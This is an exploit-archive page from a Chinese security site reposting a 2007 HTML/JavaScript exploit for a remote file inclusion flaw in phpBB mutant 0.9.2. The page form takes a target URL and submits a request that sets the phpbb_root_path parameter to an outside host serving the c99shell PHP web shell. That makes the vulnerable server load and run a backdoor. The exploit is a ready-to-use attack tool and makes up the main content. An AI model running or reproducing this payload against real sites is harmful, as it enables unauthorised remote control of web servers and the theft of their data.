首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Mutant 0.9.2 mutant_functions.php Remote File Inclusion Exploit 来源：bd0rk[at]hackermail.com 作者：bd0rk 发布时间：2007-04-05   <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>phpBB mutant 0.9.2 (phpbb_root_path) Remote File Inclusion Exploit</title> <script language="JavaScript"> //'Bug found and Exploit coded by bd0rk //'Vendor: http://ie.archive.ubuntu.com/sourceforge/p/ph/phpbb22-mutant/mutant-0_9_2.tar.gz //'Contact: bd0rk[at]hackermail.com //'Vulnerable Code: include_once($phpbb_root_path . 'includes/message_parser.'.$phpEx); //'$phpbb_root_path is not declared before include //'Greetings: str0ke, TheJT, rgod, Perle //#The german Hacker bd0rk var dir="/mutant_includes/" var file="/mutant_functions.php?" var parameter ="phpbb_root_path=" var shell="http://dot.hazard.free.fr/hacking/exploits/Backdoor/c99shell.txt?" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">phpBB mutant 0.9.2 (phpbb_root_path) Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();">     <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">   </font><font color="#FF0000" size="2">&nbsp;</font></b>   <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>   <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·AOL SuperBuddy ActiveX Control ·HP Mercury Quality Center Spid ·phpMyNewsletter <= 0.8 (beta5) ·CyBoards PHP Lite 1.21 (script ·Wserve HTTP Server 4.6 (Long D ·MS Windows Explorer Unspecifie ·MS Windows Animated Cursor (.A ·phpwind 5.x exploits ·MyBulletinBoard (MyBB) <= 1.2. ·phpwind5.x passport_client.php ·HP Mercury Quality Center 9.0 ·MS Windows GDI Local Privilege   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved